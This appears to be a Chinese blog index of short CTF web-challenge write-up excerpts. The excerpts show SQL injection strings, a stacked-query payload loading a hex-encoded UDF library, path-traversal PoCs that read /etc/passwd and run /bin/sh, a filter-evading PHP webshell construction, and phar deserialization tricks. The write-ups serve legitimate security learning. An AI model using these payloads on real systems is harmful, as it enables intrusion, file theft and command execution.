Aninock

摘要： 可以看到如果是amdin用户可以执行date指令，而date指令可以suid提权读取文件 首先看注册过程 邮箱不能和管理员邮箱一样防止覆盖，让后id位数有限制，后面在数据库中可以发现判断是否是管理员用户正是看邮箱是不是admin@cscg.de和id是否大于900000，对于id注册是用1e10科学 阅读全文

摘要： 比赛比较简单，只做web，也是ak了。 where-are-the-cookies 查看robots.txt cookie是no的base64编码，改成yes的base64即可 why-are-types-weird password为 sha1('aaroZmOk') //0e6650701996 阅读全文

摘要： if (window.debug?.extension) { let res = await fetch(window.debug?.extension.toString()); extension = await res.json(); } 对于这题第一个点就是如何通过这个判断。题目有个地方可以插 阅读全文

摘要： www.zip下载源码 看源码 传入两个参数c和m，然后创建新的c类，执行c类的m函数 没有的类通过autoload调用，限定目录和后缀 默认给三个类能调用，看主要的file类 有一个getfile函数，能够调用和重写内容，但是内容我们没法指定 注意有三个类有一个pop链 <?php class U 阅读全文

摘要： PHP session 存储方式 php_serialize 经过 serialize() 函数序列化数组 a:1:{s:4:“name”;s:5:“ocean”;} php（默认） 键名 竖线 经过 serialize() 函数处理的值 name|s:5:“ocean”; php_binary 键 阅读全文

摘要： 时间注入拿到admin密码登入，根据sql逻辑构造udf上传，再通过curl提权查看flag payload： -1';create table zzz (c BLOB);INSERT INTO zzz values(unhex('7F454C4602010100000000000000000003 阅读全文

摘要： poc读取 /cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd poc读取执行 /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh' -d 'A=|echo;id' 阅读全文

摘要： 传入$password进行查询，获取查询结果中的password和传入的$password进行比较，如果password能知道直接登入即可，否则只能尝试注入 尝试1' or 1=1#,注意到有过滤，在尝试构造 '^0# 提示password，因为这里获取的正确password会和传入的： '^0# 阅读全文

摘要： 过滤了异或取反构造，这里用自增 $_=[];$_=@"$_";$_=$_['!'=='@'];$___=$_;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__+ 阅读全文

摘要： phar://是一种伪协议，个人感觉是用来打包的，可以用它获取打包的文件 注意url，类似文件包含，改成index试试 推测是再后面加上.php再进行文件读取 注意不仅能传图片也能传压缩包，我们目的是执行成php，这里用的phar进行打包 <?php $phar = new Phar("phar.p 阅读全文